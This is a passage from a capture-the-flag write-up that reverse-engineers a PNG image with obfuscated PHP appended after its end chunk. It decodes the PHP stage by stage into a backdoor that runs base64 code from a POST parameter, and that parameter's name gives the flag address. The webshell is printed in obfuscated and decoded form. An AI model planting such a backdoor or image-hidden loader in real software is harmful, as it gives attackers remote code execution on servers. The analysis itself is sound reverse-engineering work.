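           b'eval($do_me); ?>')
SAMPLE = make_png_1x1() + PAYLOAD

if __name__ == "__main__":
    offset, trailer = find_png_trailer(SAMPLE)
    print(f"IEND ends at {offset:#x}; {len(trailer)} trailing bytes")
    print(extract_php(trailer))
```

The CRC check matters: it distinguishes a clean image with a trailer (every CRC valid, data after IEND) from a file whose chunk structure itself has been tampered with. A tool such as pngcheck reports trailing data after IEND as well, but the script above also hands you the trailer bytes for the next step.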
First decoding stage (PHP)
Replace the eval() call with print() so that the first decoding stage is displayed instead of executed, then run the script:
$ php image-code.php
Here is what it outputs:
$_= \'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\';
$__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\';
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));
Second decoding stage (PHP)
Once again, replace eval with print in the printed code and run the new script. Two details: the printed stage has \' around the two base64 strings because the "\'" entry of $terms is a literal backslash followed by a quote inside a PHP double-quoted string, so drop those backslashes when saving the file; and $___ is simply "base64_decode" spelled out with hex and octal escapes, so the eval runs base64_decode($__):
$ cat image-code-2.php
<?php
$_= 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9';
$__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
print($___($__));
?>
$ php image-code-2.php
$code=base64_decode($_);eval($code);
Third decoding stage (base64)
Stage 2 base64-decodes $_ and evals the result, so the next stage is simply the base64 blob stored in $_ (take the full string printed by stage 1). Let's decode it:
$ echo "aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9" | base64 -d
if(isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"])) { eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"])); }
Fourth decoding stage (decimal, hex)
What came out is a minimal PHP backdoor: if a POST parameter with an obfuscated name is present, its value is base64-decoded and passed to eval(). The parameter name is the interesting part. It is written as a mix of "\NNN" escapes meant to be read as decimal character codes (e.g. "\97" is "a") and "\xNN" hex escapes (e.g. "\x4F" is "O"). Note that a real PHP parser treats "\NNN" as octal and only accepts digits 0-7, so "\97" would not be decoded by the interpreter at all; the decimal reading is what the challenge intends and is the only one that yields a sensible string. Let's process the two strings in Python:
#!/usr/bin/env python3
# Decode one $_POST key: entries starting with "x" are hex escapes (\xNN),
# the others are decimal character codes (the challenge's \NNN convention).
def decode_list(l):
    o = []
    for i in l:
        if i[0] == "x":
            o.append(chr(int(i[1:], 16)))   # "x4F" -> "O"
        else:
            o.append(chr(int(i)))           # "97" -> "a"
    return ''.join(o)

# key used in isset($_POST[...])
print("1st string: %s" % decode_list(["97", "49", "49", "68", "x4F", "84", "116", "x68", "97", "x74", "x44", "x4F", "x54", "x6A", "97", "x76", "x61", "x35", "x63", "x72", "97", "x70", "x41", "84", "x66", "x6C", "97", "x72", "x65", "x44", "65", "x53", "72", "111", "110", "68", "79", "84", "99", "x6F", "x6D"]))
# key used in eval(base64_decode($_POST[...]))
print("2nd string: %s" % decode_list(["97", "49", "x31", "68", "x4F", "x54", "116", "104", "x61", "116", "x44", "79", "x54", "106", "97", "118", "97", "53", "x63", "114", "x61", "x70", "65", "84", "102", "x6C", "x61", "114", "101", "x44", "65", "x53", "72", "111", "x6E", "x44", "x4F", "84", "99", "x6F", "x6D"]))
Here is the output of the script:
$ python challenge2.py
1st string: a11DOTthatDOTjava5crapATflareDASHonDOTcom
2nd string: a11DOTthatDOTjava5crapATflareDASHonDOTcom
Solution of challenge 2
Replacing DOT, AT and DASH with the symbols they stand for gives the solution to challenge 2, which is an e-mail address:
$ echo "a11DOTthatDOTjava5crapATflareDASHonDOTcom" | sed "s/DOT/./g; s/AT/@/; s/DASH/-/"
a11.that.java5crap@flare-on.com
Keywords: reverse-engineering challenge flare fireeye